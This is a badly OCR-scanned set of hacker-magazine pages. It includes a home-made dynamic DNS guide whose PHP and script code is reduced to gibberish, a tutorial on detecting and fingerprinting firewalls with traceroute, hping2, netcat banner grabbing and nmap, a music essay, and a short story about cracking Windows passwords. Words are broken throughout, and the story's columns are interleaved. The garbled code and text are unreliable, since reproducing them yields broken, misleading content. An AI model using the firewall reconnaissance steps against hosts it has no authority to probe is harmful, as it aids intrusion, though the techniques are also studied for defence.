You want to set up a darknet for a few
friends, and so you need to be abl e to give
them a static I P address. Of course, you r I SP
switches you r I nternet-accessibl e I P address
randoml y and gives you a rel ativel y usel ess
dynamic I P. Yes, you can find a Dynamic DNS
service that a l l ows you to update a domain
name as often as your I SP changes your I P, but
either I picked a bad DDNS service or a l ot
of peopl e have the same probl em: more often
than not, the domain name I had been given
woul d timeout, l eaving my friends discon
nected. That ' s when I cobbl ed together a
quick persona l DDNS service, using l ess t han
50 l ines of code, most of whi ch are PHP.
The I ngredi ents
To ma ke t his work, you ' l l need you r own
doma i n or web page with FTP access and
P HP. You a l so need t he a bi l ity to r un PHP
on you r home machine. Fina l l y, you need
a command- l ine FTP util ity on you r home
mach i ne, s uch as t he one incl u ded with
Windows XP. I set my service u p u nder
Wi ndows XP, r unning P HP u nder XAMPP
0 . Ct) .
Getti ng Your I P
This is the whol e code of the PHP page
you ' l l pl ace somewhere on you r domain, to
sniff you r I P:
Uti l L L : / /www . CUt- CCi1 l . CCi/
M1 . l ,
I I L l1 1 Ll Cl Ll wl LlL
MtLUtl CUt ! l
L l - ' : \ 1 . LL ,
I I L l1 I Ll !1 LlL CU ! !
Mwt 1 L CUt l l LC
CiC - L L : L : \ 1U . LL ,
I I L lI I Ll CCiilC- 1 1l
MC 1 1 L C Ll l`l tCti
ClC ' L L I l 1 l tC0 Uti . . . \ l " ,
I I Cl Ll w-l lC ll Ll l l
$ fp - f open ( $url " r " ) o r die :
CL - LtC | , 4 O | l ,
C! C | ! ; ,
I I w: 1 L Ll ! l LC Ll ! 1 L Ct U1 CC
lw - !Cl | !l , w+ ; Ct C1 ,
? >
.lC w1 I L I l CL LC i CC1 !! . . . \ l ,
l ! | 1 _wtI | l1 | Ll ; ; {
I ! | ! llC1 !Cl | Ll , wl ) ;
w
1 L ,
1 | !w .1 L | llC1 ,
CL ; l'L ;
w
. L ,
! 1 C | llCi ; ,
ClC l1l Il C' L C
your - doma i n . . . \ : ;
l! 1_C | CiC ; ,
I I Ll1 C) L- Ll l`l CC!ilC LlL
M O! CC Ll !i CU O L wtCL
Updating Your I P: The FTP Cal l
I - H``l_'Ll\Ll_\l' lLM.L_LLl 1 ,
ClC I ,
This part may be different for some peopl e.
If you hit that page using a web browser,
you ' l l get you r cu rrent I nternet-accessibl e I P
a s the resu I t.
This is t he code in a text fil e that tel l s the FTP
util ity what to do. This fil e is cal l ed 1 U .
L L in t he C0C variabl e above. The l ines that
start with UCL " are commands to your FTP
Shari ng Your I P
server once you ' re connected. To find t he
This i s t he main bit of coding; it ' s al so i n
exact wording, I used t he FireFTP pl ugin for
PHP. I n a nutshel l , the script goes out to you r
Firefox, copied a fil e over to my domain, and
page on the web, which ret u rns you r cur rent
took t he commands from its l og.
I P. I chose to output this to a fil e on my home
Cl www. C!: Ci . l . CCi
machine, then upl oad the fil e, which contains
! t 0
nothing but my I P, to my web server. I cou l d
c. wCtC
UCL wL /CUt CCi 1 l . CC0/ lw C1 tC LCt
have written t he code on my server t o l og my
!CL `:lL
I P when I hit t he page, but t he danger there is
_UCL l'\
that some web robot, spider, or casual surfer
U L ' : \ : . L L
might trip the page, writing t he wrong I P
C 1 C
address t o t he fil e. Anyway, here' s t he magic: | ! |
l[CO
2%a
[
aZnC
The wl command is just to change the
di rectory once connected, so that my I P fi le
gets saved somewhere other t han the root
di rectory of my doma i n.
Updati ng Your I P: The Service
So far, so easy. The problem i s that you ' d
have to cal l the mai n PHP scr i pt every t i me
you want t o update your I P. I nstead, you can
schedul e i t as a Scheduled Task i n Wi ndows to
ru n all day, every day, every 15 mi nutes. I t ' s as
s i mple as wri t i ng a one-li ne batch fi le:
: \ 0\ l\ l . :C : \ lOr j . jl
You then schedul e the task to run that
"program" every 15 mi nutes.
The only probl em i s maki ng the task r un
i nvi s i bly wi t hout havi ng t o go i n and edi t t he
Regi stry t o set i t up as a bona-fi de servi ce. The
way i t ' s set up now, the task wi ll r un, but a
shel l wi ndow wi l l pop up every t i me it does
so. I t ' s only there for a few seconds, but i t ' s
real ly annoyi ng every 15 mi nutes. To make i t
ru n i nvi s i bl y, you need t o r un i t us i ng wscr i pt,
the Wi ndows scr i pt i ng language. Wr i te t hi s
i nto a . vb " fi l e:
tL 'l C | | w: . L . ' | l . lOl
w'C1l L . I O0lL | O ; , O , l' 1 .
Then, change your schfduled task t o call
your scri pt li ke t hi s . The onl y da nger is that
i f you don ' t test your scr i pt fi rst and i t fa i l s,
you ' l l never know about the fa i l u re.
: \w!lL'W' \ |0` \\C: L . C : \
M1l\l l . \! : \ ` lO1 . ll
Your scr i pt wi ll now r un i nvi s i bly every
fi fteen mi nutes, uploadi ng your cu rrent I P
address to you r websi te a s a text fi le. You can
ei t her tell you r fr i ends t o hi t that fi l e t o get
your current I P address, or you can work i t
i nto a qui ck and easy PHP page that tells t hem
the I P and also when t he fi le was l ast updated.
Hel l , throw t hi s on the page, too, and i t ' l l pi ng
you r I P so t hey know i f the connect i on i s sti ll
good:
! I CCICl | OO , Ct L ,
:tlC , t1 L t , L 10CUL l ;
/ / O Oy 1 yCOt COt Llt TP OLL
Ml Ll C:L CO: C l 1 . L i ; 1 1 i ,
I I L 1iCOL 1 . lCw 1 Cl | C
Mw 1 L ( 2 i OlO l
1 L | L l
ClC CliC L l Cl CCO !
L C i C | l ;
, 1' `
ClC CllCCLi Cl OCwl .
Caveats
So, that's i t! 48 l i nes of code over 5 fi les, by
my cou nt; t hat ' s wi th n i cely-spaced PHP, and
i t i ncludes the scheduled task call as a l i ne of
code. I di dn' t count the pi ng code, si nce i t's
not necessary. Who needs to gi ve a th i rd-party
servi n' any i dea what you ' re up to or a DDNS
updater app ru nni ng i n the background? But
there are some caveats . . .
The FTP connect i on i s not secu re, so you ' re
broadcast i ng you r u nencrypted FTP username
and password every 15 mi nutes. Al so, i f you r
web host i s sti ngy, they mi ght l i mi t t he nu mber
of FTP connecti ons you can make i n J day.
And, fi nal l y, you ' re putti ng your cu rrent I I
address o n the wpb. Wei gh the odds, draw
your own conclusi ons, and tweak the fi x.
Di scoveri ng
Fi rewal l s
by suN8Hcl f
suN8Hcl f@vp. pl
OxOO I ntroduction
Sett i ng up a fi rewall i s one of the most
i mportant and bas i c elements of a secu ri ty
pol i cy. They are used used to prevent unau
thori zed users from accessi ng protected
computers ind networks. Bas i cal ly, fi rewa l ls
can be di vi ded i nto two groups: hardware
f i rewa l ls and softwa re ones. f; ardware fi re
walls are often placpd on the route between
a protected network a nd I nternet. Thei r task to
an:l I Y7e all network traffi c. Then, on the bJs i s
of rules defi ned by system admi ni strator, they
deci de what to do wi th every packet. These
fi rewal l s hdV also thei r own I P address. Soft
ware fi rewal l s an' just computer programs
wh i ch mon i tor other appli cati ons. Such fi re
wal l s see if other progra ms want, for eXJllpll"
to establ i sh a new connect i on, and then
deci de whlther to allow them or not. Software
fi rewalls very often bl ock i ncomi ng connec
t i ons from the "outsi de" i nternet.
ulumn 2d

la
[COO
I ' l l now descr i be a few techni ques whi ch
can be used t o deter mi ne i f there i s a fi rewa l l
on the way to a target a n d then to di scover the
type and versi on of the fi rewa l l .
OxOl Di scoveri ng Fi rewal l s
There are a few di fferent methods you can
use t o see i f there i s a fi rewa l l between your
computer and some remote host.
Basi c trace route: The traceroute program
traces the route to a host usi ng I CMP or UDP
packets a n d the TTL fi el d i n the I P header. Most
fi rewal l s bl ock I CMP requests and responses.
J ust type:
# traceroute WW. server . com
3 . rou t erl . ma i n . com
4 . rou ter2 . ra i n . com
5 .
^ ^ ^
As you can see, host 5 above has not sent
us an I CMP response. 50 t hi s host mi ght be a
fi rewa l l .
rcp traceroute: Now, we' l l try to deter
mi ne the I P address of the fi rewa l l . To do th i s,
we have to go t hrough the fi rewal l , wh i ch i s
host 5 i n our case. Most of t hem a l l ow parti c
ul ar types of TCP traffi c; therefore, we can try
to send a TCP packet to a "popul ar" port such
as 80, whi ch i s used for HTTP . .
# hpi ng2 - T -t 1 ' -p
80 www . s erver . com
hop= 4 TTL 0 dur i ng t ransmi t f rom
-i p= 1 0 . 1 . 1 . 2 2 5 name = rout er2 . ma i n . com
hop = 5 TTL 0 dur i ng transmi t f rom
-i p= 1 0 . 2 . 2 . 2 2 5 name =UNKNOWN
As you can see, we were abl e to go
through, and we now know that the I P address
of the fi rewal l is 10. 2. 2. 225 and that its name
i s u nknown.
TTL di fferences: The TTL fi el d i s decre
mented every t i me an I P packet goes through
a network devi ce. Therefore, we can assume
that i f a server i s protected by a fi rewal l , every
packet that comes from th i s server wi l l have an
TTL val ue di fferent from packets whi ch come
di rectl y from the fi rewa l l . To exa mi ne t hi s, we
can send one TCP packet to a port whi ch we
know that i s open and one packet to a cl osed
port. The fi rst packet wi l l l ook l i ke t hi s:
# hpi ng2 ' - p 80 - c 1 www . server . com
l en= 4 6 i p= 1 9 2 . 1 6 8 . 0 . 4 fag s = SA DF seq= O
-t t l = 2 7 i d = O wi n= 5 8 2 0 r t t = 9 . 2 ms
The second packet wi l l l ook l i ke t hi s:
# hpi ng2 ' - p 9 9 9 9 - c
1 www . s erver . com
l en= 4 6 i p= 1 9 2 . 1 6 8 . 0 . 4 fla g s = SA DF
-seq = O t t l = 2 8 id= O wi n= O r t t = 9 . 2 ms
The TTL va l ue i s 27 i n the fi rst exampl e and
28 i n the second. Thi s i s the most i mportant
evi dence that ww. s erver . com i s beh i nd a
ha rdware fi rewa l l .
Ox02 I dentifyi ng Fi rewal l s
Now that we know the I P address of t he
fi rewa l l , we can t r y t o determi ne the t ype and
versi on of the fi rewal l .
Si mpl e banner grabbi ng: Th i s i s probabl y
t he best-known techn i que. J ust t el net t o the
fi rewa l l and read a l l messages that sends i n
response. You c a n al so use netcat:
# nc vv fi rewa l l . ma i n . com
rcp footprinting: Every operati ng system' s
I P stack di ffers i n sma l l ways from every other
operat i ng system' s . The presence of softwa re
fi rewal l s a l so changes the behavi or of the I P
stack i n sma l l ways. Knowi ng these di ffer
ences can be a c l ue to determi ne the oper
at i ng system or type of the fi rewa l l . There
are l ots of programs whi ch are usefu l duri ng
t hi s process, such as nmap, pDf, and xprobe.
When we know the I P address of the fi rewal l
or s i mpl y the name of the server, we can use
nmap to fi ngerpr i nt i t :
# nmap S ' www . server . com
# nmap - s S ' frewa l l . ma i n . com
Deaful t ports: Most fi rewal l s use parti c
ul ar wel l - known ports for remote tasks such
as remote admi ni strat i on, remote confi gu ra
t i on, or remote l oggi ng. Here are some defaul t
ports whi ch can ai d i n i denti fyi ng t he fi rewa l l :
The 5ymantec Enterpri se Fi rewa l l l i stens on
TCP ports 888 and 2456, and the Check
poi nt FW1 - NG l i stens on TCP ports 256, 257,
18181, and 18190.
Ox03 Concl usi on
Thi s a rt i cl e i s onl y a smal l i ntroduct i on
t o the fi ngerpr i nt i ng of fi rewa l l s. Thi s topi c i s
very wi de and, l i ke port sca nni ng or expl oi t i ng
buffer overfl ows, very i mportant t o hackers.
Special thanks to Mr P Sobczak, Mrs
M. Domosud (for trust), M. Slaski, P Jeda,
P Wieczorek, D. Zagalski, Gin, Die_Angel, and
abwmiZ (for inspiration) .
l
[
C 2%
[
ZnC
by Dr. Zoltan
drzol tan@drzol tan. com
thing el se, the same way that they want their
computer to function l ike a toaster or a car or
other singl e-function appliance. Music just is not
something they want to tinker with.
The essence of hacking is expl oration, l ed by
And that is fine. Not everyone wants to be
curiosity. It is about figuring out the r ul es and
a car mechanic; they just want to drive to work
then bending those ru l es to make something
and l eave the detail s to the mad scientists.
new.
Yet a sma l l handfu l of us are the mad scien-
Hackers are peopl e who are just not satis-
tists who need to point the microscope at some
fied with how a system seems to work from
certain area of l ife. The hacker ethic of explo-
the outside. They find backdoors, fl aws, and
ration and curiosity can be applied to music in
secret passages which expand the capacities of
very specific ways. Here are some exa mpl es.
technol ogy. They are al ways asking questions,
The majority of the music heard on the
pushing buttons to see what happens, stretching
radio is an endless series of measures (spaces of
their understanding, taking things apart, and
time) divided into two or four parts. What about
putting them back together.
dividing them into five? Or seven? What wou l d
I n a simil ar way, many arbitrary r ul es of
that sound l ike! Fu rther, what if you l eave out
music can be broken. The fundamental act of
some of those beats within the five or seven?
doing something new with music is to ask the
These have very distinct and striking sounds that
question, "Which of these supposed l imitations
can become part of everyone's musical vocabu-
can I dispose of?"
l ary. You can l earn to recognize them just the
What has drawn me towards the hacker
same as a four-count measure, and you can do
community is their desire to break the l imita-
some very fascinating things with them. There
tions of a system. Yet in the fiel d of music, I have
are very few bands doing this sort of thing!
found that even among the fringe composers,
When programming music using sequencing
there is an extreme fear of breaking those tradi-
software, why restrict yoursel f to the l imitations
tional l imits.
of a human performer? When you are watching a
But why? At l east in music, if you insert a
sci-fi or fantasy movie l ike X-Men, you probabl y
sour or dissonant note, the rest of the compo-
do not compl ain that rea l humans cou l d never do
sition wil l remain intact. No big deal . This is
that! With the hel p of computers, we can create
not al ways so with technol ogy, as there can
incredibl e performances and combine sounds in
be serious mal functions. A computer system
ways that we previousl y cou l d not. Yet, everyone
may cease to function if you remove any of its
is stil l stuck with guitar, bass, drums, and vocal s,
parts. In an art so seemingl y arbitrary, why are
churning out the same ol d sounds. Again, very
composers so preoccupied with reinforcing the
few peopl e bother to use computers to create
status quo? No one is going to die, no one wil l
cha l l enging music.
be inj ured, and no property wil l be damaged if Did you know that al most a l l musical instru-
some r ul es are bent.
ments are out of tune, due to equal tempera-
In the mainstream cul ture of the United States,
ment tuning? The harmonic overtones that occur
music i s viewed with an anti-intel l ectual preju-
in nature do not line up with a strict ru l er of
dice. Yet it is not onl y an art; it is al so a science.
measurement that equal l y divides them into
The majority view music as an intuitivel y magic
twel ve divisions, which is how we have been
pil l that makes them feel better on command.
dividing them since the time of Bach. Our entire
They avoid l earning its rich vocabu l ary in the
vocabul ary of consonance and dissonance was
same way that a Luddite refuses to l earn how
created by arbitrary r ul es based on this system.
a circuit board works. Just as with el ectronics, Yet we have the ability to program computers
there is a science behind the art of music. You to break that barrier and arrange j ust-tempered
don't j ust throw el ectronic components together harmonies that few peopl e have experienced.
at random with no rhyme or reason and expect What the worl d needs is more peopl e
them t o work, so why appl y this bl ind method to applying the hacker mentality to music, because
music? Because consumers j ust want music on j ust as there is more to a computer than porn,
in the background whil e they are doing some- there is more to music than banging on a guitar.
ulumn 2dl[C
By Peter Wrenshal l
with no questions asked. I wondered why this
time was different. "We ought to be making an
I am not a hacker, but I thought you might
example of him," continued Roper. If he had
be interested in hearing about the first time I got
his way, I think he really would have called the
paid-kind of-for cracking the password on a
cops, which would have been doubly bad news
Microsoft Windows box.
for me. At the time, I had just started running my
I was 1 5 at the time, and I was on "proba-
own computer repair business; and I figured that
tion" after being accused of hacking my school's
I even if I charged 50 per job plus parts, I 'd still
computer. Our IT teacher, Roper, had noticed
undercut the local shops and get tons of work.
that someone had changed the computer's
With plenty of money to be made, the last thing I
I nternet proxy server address, and because I
needed was a reputation as a cracker. People just
was the last person to use that machine, I was
don't trust them with their personal computers.
his prime suspect. He had no evidence that it
"Might I remind you," said Fenning, looking
was me, but that didn't stop him from hauling
a bit irritated at the interruption, "that you have
me to the headmaster' s office, where they both
no direct evidence that he was involved?" It was
grilled me.
my turn to smile, but I restrained it. Although we
"You might as well tell us," threatened Head-
all knew that I had done it, we all also knew that
master Fenning, leaning back in his leather chair,
Roper had no proof. Or perhaps it was more than
"rather than tell the police. Did you hack into
that. I got the idea that there was some bad blood
that machine?"
between Fenning and Roper, some sort of school
"No, sir," I said, innocently. " I t wasn't me."
politics. But if Fenning was using me as political
Well, I hadn' t hacked into it, as such. I had
leverage, that was fine by me.
used a program to guess the password, which is
"He was the last person to use that machine.
different.
He knows computers," whined Roper. As if that
"Because if I find out that any pupil in this
were evidence.
school has been engaging in hacking," Fenning
"Perhaps there is another solution," suggested
continued, "I will suspend him and revoke all
Fenning patiently. " How would you feel about
computer privileges . . . "
offloading a few of your duties to some of the
"Yes, sir."
more advanced students? I t may be that the chal-
" . . . and, depending on the circumstances, I
lenge of looking after the computers creates
may call in the police. They take computer crime
within them a sense of responsibility."
very seriously these days."
Roper frowned. His confusion was evident.
I saw Roper do something he rarely did: he
Was Fenning really suggesting that students get
smiled. It wasn't the proxy hack that bugged
more access to the network, instead of less?
him; it was the idea that, in order to change the
"As with the Prefect system . . . " began Fenning,
proxy, I first would have had to obtain the admin-
but Roper butted in. "I sn't that a bit like putting
istrator's password. And that meant that not only
the fox in charge of the henhouse?"
could I change the proxy to surf unrestricted, but
He had interrupted
once too often, and
I also could do anything else I wanted: change
Fenning had lost his patience. He played his
the school' s dreary logo, install games, or infect
ace. "I t is clear to me that the problems you are
the whole network of computer
s
with viruses
.
experiencing are because the brighter pupils
But Roper's victory was short-lived. Fenning
are not inspired by your syllabus. Perhaps your
continued. "This time, I am going to have to give
approach to teaching computing needs to be
you the benefit of the doubt . . . "
more challenging ... "
He didn't even finish
his sentence before
Roper blinked. He looked a bit shocked. He
Roper almost exploded. "Benefit of the doubt ! "
tried t o defend himself, claiming that his depart-
he raged. I saw his face turn red as his blood
ment lacked funding; but I didn't buy that, and
pressure climbed. I was surprised myself. I 'd
neither did Fenning. The argument was over.
already been in Fenning' s office that year for
"And as far as I can see," concluded Fenning,
playing pitch-and-toss and, on that occasion, I 'd
"you have no actual evidence of his involve-
been tried and sentenced in about 3 0 seconds,
ment in any computer hacking activities. I now
la
[
C d
2%a
[
aZnC
consider the matter closed." foreign words at the woman, who surprised
He stopped leaning on his chair, and sat up me by firing right back with just as much force.
straight. The battle was over. It wasn't hard to Then the other man joined in briefly. I caught
guess who would win, anyway. Unlike Roper, the words "da" and "nyet," and I knew that they
who wouldn't have looked out of place behind were Russians, though as far as I knew there
a library desk, Fenning always dressed like he weren't any Russians in that part of town. I took
was CEO of High School, I nc. In a battle of a look at them.
wits between him and Roper, I 'd have stuck my Despite the hot weather, the bigger of the two
money on him, based on the suit and tie alone. was wearing a black leather jacket, which bulged
Roper's shoulders drooped visibly. Fenning under his arms and hips, the holster areas. The
gave me a couple more lines about how I was on smaller guy was wearing jeans and a jacket that
probation and how I should stay out of trouble, would have been fashionable about the time
and then ejected me from his office. Later that Dr. Strangelove was pulling in the crowds. The
day, I saw Roper in the corridor and got a nasty woman looked like one of those Russian tennis
stare, but I survived players, but without the brand names.
Now, this is the bit that's hard to believe. "They want you fix computer. They pay
Actually, I 'm not totally sure it really happened. hundred pounds," she tried again.
It was about three weeks later, a Friday, and I "Undrid quids. Yis?" said the guy in the jacket.
had almost totally forgotten the incident. I was He rubbed his forefingers and thumb together in
walking home from school and had just come the international gesture of money grubbing. I
out of a shop. When I was about to cross the must have been staring, because the woman
road, a woman walked right in front of me. said, "I s ten minutes job."
"Hello," she said with a thick accent. In that "Shop - fix computer - down road," I said,
rough part of town, people got used to being helpfully leaving out the words that might get
stopped by street vendors trying to sell them lost in translation. I couldn't believe that I was
knocked-off Rolex watches, fake prescription advertising my business competition, but this
medications, or other sorts of black-market job sounded like one to pass on. The guy in the
goods. I had developed a technique for avoiding sunglasses took out bunch of banknotes, and
them. I said hello to the woman, without really showed them to me.
making eye contact, and then dodged around "Shop closed, " said the woman. "You please
her. But this time the traffic lights were against help. Ten minutes."
me, and I had nowhere to go. I stood at the curb, Yeah, I thought. But what kind of job? My
waiting. imagination broke loose thinking about some
"You want earn hundred pounds, no?" asked crime lord whose laptop had a broken hard disk,
the women. The sides of her mouth curled up some underworld guy who treated his computer
like someone who was out of practice smiling. like he treated the hired help, and had lost his
As I say, in that rough part of town, people got database of clientele and, with it his livelihood.
used to the street hawkers embracing capitalism A Russian bear with a sore head.
a bit too enthusiastically; but as far as I could tell What also got my imagination revving was
I was being offered a job, and that was a new the question of how these Russians had gotten
one on me. this idea about my computer repair skills. I t
"Sorry, " I said, politely, because her business was the early days for my business, and I hadn't
associates were sure to be nearby, "you have me done any advertising. I was counting on word of
mixed up with someone else. " I knew about the mouth to get started.
Polish, Armenian, and Croatian communities, I tried to put them off. "What broke on
about how they had come to work in the city. computer?" I asked, and got a blank stare. There
I also had heard a few rumors about how they was a bit of a lull in the conversation, during
settled some of their disputes . I didn't want to get which time a guy I recognized and his girlfriend
in the middle of one. walked past, determinedly minding their own
As this was happening, I noticed the doors business and not looking at us.
of an ancient brown Ford open, and two men "I s easy money for clever guy," said tennis
got out. The previous month a guy had pulled girl, prompting again me with her moribund
up in a van and offered to sell me a "real-deal" smile. She was athletic and definitely easy on the
Armani suit (me, in a suit; sure), and I had gotten eyes, and under different circumstances, I 'd have
rid of him by telling him that I couldn' t talk to fixed her computer for free or traded her for a
him because my "friends" (the local rugby team, couple of tennis lessons.
maybe) were waiting for me. I tried the same Because she apparently wouldn't take "no"
line on the woman, and went to walk back the for an answer, I decided that the easiest way to get
way I had come, but she just moved into my way rid of her friends would be to take a quick look
again. She gave me a blank stare and held her at their broken computer, say "Niet, is kaput. You
frosty smile, as we waited for the men to arrive. take to shop, " and then see if she wanted to grab
The biggest of the men fired off a string of a burger in the interest of international relations.
ulumn 2d
la
[
C V
"Ten mi nutes?" I asked her.
"Yes. Ten mi nutes."
"Okay."
I got into the car wi th Comrade j acket and
Comrade Sunglasses, and as the door slammed
shut I watched the woman walk away. I was
going to open my mouth to ask what happened
to the gi rl, but nobody was looking at me, and
we were already moving.
I sat qui etly and watched the bu i ldi ngs go
past. For some reason, the tune to the TV detec
ti ve comedy "Get Smart" was playi ng in my
head, and wouldn' t stop. The only words the
men sai d were in Russi an, and the only Russi an
I knew came from reading I van Deni sovi ch. The
words gulag, zeks, and Si beri a di d seem all too
appropr i ate to the si tuati on.
I kept wonder i ng how they had gotten the
idea that I went around fi xi ng computers. I
mean, I wasn' t that nerdish- I ooki ng. Had some
body sa i d something to them to put them onto
me? I di dn' t know any Russi ans; they, however,
obvi ously knew me. I had read that the KGB. , or
the K-G-used-to-B, sti ll had an acti ve network of
sleeper agents around the world. The newspaper
headlines I had been i magi ni ng changed from
"Teen boy i nvolved into cri mi nal underworld" to
"Teen boy i nvolved in espionage."
It was over 20 mi nutes later when the dri ver
fi nally parked the car. At my current rate of 1 00
per 1 0 mi nutes, I had already earned 200, but
at the ti me I was more concerned wi th what we
were doing at the docks.
We got out of the car and j acket led the way
up a gangplank onto a shi p that was about the
any strange noises. I could see the logon box. I
went over to i t, followed by the Russi ans, and
the last of my opt i mi sm vani shed when I saw that
the text on the screen was in Russi an. So was the
keyboard.
I shrugged. "It's in Russi an. " jacket nodded,
and wai ted. I spoke slowly.
"Me change computer to English, after you
log on."
j acket nodded. I tri ed one last ti me.
"You log on. "
jacket nodded aga i n. I wa i ted for someone
to say or do something sensible. After all, if I
couldn' t log on, I couldn't even begin to fi nd
out what was wrong. We stood looking at each
other. Another three men came into the room
and joined the audi ence. There was a steady
engine noise, but nobody was sayi ng anything.
It felt li ke one of those standoffs you used to read
about, wi th the Russi ans postu ri ng and the West
posturi ng, and only the newspapers wi nni ng.
But as I looked around the room, I noticed
that Sunglasses was sweati ng. He was looking
li ke he was about to be sent to Si ber i a for a year.
And then it hi t me. How slow I had been! They
couldn't log on because they were locked out!
That was what needed fi xi ng. Sunglasses had
forgotten the password. It was as si mple as that.
They weren' t goi ng to make me break into the
Pentagon, eat fi sh eggs, or denounce capi tali sm;
they had si mply forgotten thei r password. I guess
it happens to the best of us. It happened to my
English teacher, Mrs. Moran, about twi ce each
week.
same si ze as a big trawler but di dn't have any As I sa i d, I am not a hacker. Apart from that
fi shi ng nets. My grandfather had worked on one machi ne at school, my hacki ng experi -
ships, and as a ki d I had always li ked the idea ence was l i mi ted to multi ple vi ewi ngs of the
of going to sea, but thi s was not what I had i n fi lm WarGames. Although I 'd had thoughts
mi nd. about Ally Sheedy, j ogging over to my house
We went i nsi de, down a metal ladder, and to start World War I I I , that was about as far as
along a corri dor. The whole shi p looked l i ke I had progressed. But I was confident that thi s
looked l i ke i t had spent some t i me collecti ng di rt j ob would be strai ghtforward. I carri ed on me a
on the bottom of the ocean, only to be re-floated, bootable memory sti ck wi th the requi red soft-
dri ed off a bi t, and put it back into servi ce, a ware. All I had to do was to boot off it and run
floati ng testament to Soviet effi ci ency. the SAM cracker. I plugged my memory sti ck into
We went into a room, and found a guy who the Russi an's computer.
sat at a desk. He turned around to look at us. He j ust then, something j abbed my conscience.
pointed at the computer and sai d something i n What i f thi s computer di dn't belong t o the
Russi an. From the way he sai d i t, and from the Russi ans? What if they had stolen i t? What if they
look on the other guys' faces, there was no doubt had li fted thi s PC from some local government
that thi s was the boss man. offi ce? For all I knew, these people sti ll thought
j acket pointed at me, replied respectfully, the Cold War was on. Thi s potenti ally could go
and then they all stood around looking at me. way beyond annoyi ng Roper.
After a mi nute jacket gestured, and I followed hi s I stood there wi th my audi ence watching me,
finger to a grayi sh metal box that was si tti ng on wonderi ng what to do. I could thi nk of a dozen
the desk behind me. It was coated wi th the same agenci es and organi zati ons that would be very
gri me that clung to the rest of the ship, and the concerned about a ki d helping Russi ans break
text on the screen was barely vi si ble. into a computer. There were fanati cs out there
j acket pointed at the screen aga i n, but I who would use phrases such as "colludi ng wi th
di dn't get i t. What di d they want me to fi x? The the enemy." I mi ght even end up in Guantanamo
computer was worki ng fine, and it wasn't maki ng Bay, and orange jumpsu i ts and seri al numbers
la
[
C
2%a
[
aZnC
were just not my style.
On the other hand, at the time I had been
learning to program computers, and as a side
effect I 'd gotten into the bad habit of thi nking for
myself. I just couldn't see what helping someone
else ever bed to do witb pol iti cs.
In the end, the look on Sunglasses's face did it.
I could see that this wasn't even the K-G-wanna
B. This was a bunch of sdilors.
"You forgot password?" I sai d. l ,lC ket nodded
again, but I knew he hadn't understood me. I
booted from my memory sti ck, and when the
pengui n bad gone away, I ran the password
cracker. That was it. I was a bit surprised to fi nd
that the Cyri ll i c keyboard had famili l r numbers,
one to ni ne, so I used those. I typed the password,
and shmvpd Sunglasses and I ,l eket : 1 2 3456. They
nodded, and I pressed return and s,id "Okay."
EVfrybody undersl ands Okdy.
I rebooted to Wi ndows, a nd logged on. I
stood dsi ce to lei Sunglasses al Ihe m,1 (" hi ne, ,1nd
he opened d sJlwadshe<l ,md thpn pointed at
it. Thl' Russians peered at the screen, and their
relief VHS p'llpable. l acket gave the good news
to the boss, who, in his turn, gave Sunglassps
a furious blast of Russi,1 Il, which didn' t need
translating: lose the password again, dnd you ' ll
be swimming hore. The boss disappe,1red, and
Sunglasses smil(' (L l acket la ughed and slapped
him on his hack, and then they both turned to
me.
What next!, I wondered. Drop the witness
overboard? Arrange an accident at sea? I heard a
clink, and then watcbed as glasses werp passed
around.
"Cheers," said Sunglasses in his English.
Jacket handed me a grubby glass almost full of
clear liquid.
"That ' s okay," I said, but it wasn't one of those
offers I could decline. They all stood waiting for
me to drink. I shrugged, and lifted my glass.
"Perestroika," I said, which got a round of
laughs. The glasses went up, and then banged
down on the desk. I poured my drink down
my neck, and then lit up and started coughing,
which brought on anotber round of laughs.
One problem with vodka is that they make
it clear; as a result, Russian sailors mistake it
for water. We downed another quick drink, and
then Sunglasses said a few words in his fractured
English, the upshot of which was that they were
offering to take me hore in the Fordmobile.
Tbe rest of the night was a bit of a blur. We
stopped at what looked like a cafe, but which
served about a hundred types of vodka. We
ate something a bit like beef soup, only it was
called borscht. And there was something else
that looked like cabbage and black bread, which
I normally wouldn' t have touched in a mil lion
years, but it tasted very good.
After that we went to some club or pub, which
was dark and smoky, and which heaved with
the Friday night crowd, all speaking Russian. I
began to wonder how I had never noticed them
before.
When we care out, it was dark. I got into the
back of the Ford, and as I watched the streetlights
float past, I promised myself that I ' d get out more
and take regular breaks, instead of sitting i n front
of a computpr all the ti me. They dropped me off
in front of my house, I got back-slapped one last
time, ,1nd they sai d somet hing like "You core
vi si t Moscow." I said I would, , 1nd then thpy left.
For most of tbe next day I went around in bi t
of a daze, and I couldn't shrug off the feeling th,lt
I 'd somehow spent til < previ ous ni ght in an alter
nat i V dimension. The poundi ng headache from
the vodb didn' t help.
I neVr did get thdt hundred quir. I checked
my pockets cnd found what appeared to be a
gcnuine Cuban ci gar, whi ch I suppose Vc! S what
I had been pa i d for my first profession')l hack,
along with the bonus of a few blull'd memor i ps
of hummi ng along to a tune th,lt could have bppn
the Russian nati onal ,nth(' m, for ali i knew.
I thougbt about going b,H k d()vvn tn docks t o
sec i f the ship st i ll tbere, hut i n the md I didn' t.
After a f,l i lpd attempt to gpt borscbl on the school
menu, I forgot all about th,lt strange Friday ni ght.
I reapplied myself to my computer repair busi
ness, and that kept mE out of t rouble.
But sometimes during qu i et dfternoons i n the
computer room, with Roper droning on about
spreadsheets and with the Iwt-nanny protecti ng
me from my bad Intprnct habits, my mind would
wander, and I would find myself thinking about
my Russi an fri ends. I would idly wonder who
put them onto m(. And th(n I would tbink about
Fenning. Apart from Roper, he was the only other
person who knew about my cracking the school' s
admin password. It was a funny thought, this
stuffy headmaster working for the Russians . . .
I passed him i n the corridor one day, and he
said something about how nice it was to see that
my grades had improved, now that I was finally
settli ng down to some work.
"Oa," I replied. He didn' t blink; he just
kept walking. Would anybody believe my story
about a Russian spy, H sleeper agent, cunni ngl y
disguised as a schooltpdchfr in a small school?
For awhile I thought about ringing MI S, to talk to
them about Fenning.
But in the end, I gave him the benefit of the
doubt.
Have an interestng fictonal stor
cncering hackng tat you' lke to
test out on our readers? Send it on in
to arcies@2600.com. Please te! us
it' fiton so we don't inadverenty
spread a pack of les.
ulumn 2d
` '
Happenings
PHREAKNI C 1 2. Nashvi l l e 2 600 is once agci ll proud to prest'nt
PhreakNI C 1 2, fwl d every yt'Jr in Nashvi l l e, TN. Vt arc hol rl i ng
t hi s \(' chnology conference i n t he same I U(<I t i un as t he P,lSt 5 Yf;]fS,
the Days Inn et the Stddi ur on October 24t h-26t h, 2 008. Vi si t
http://phwakni ( . i nfo for the l atest i nformati on, i ncl udi ng hotel
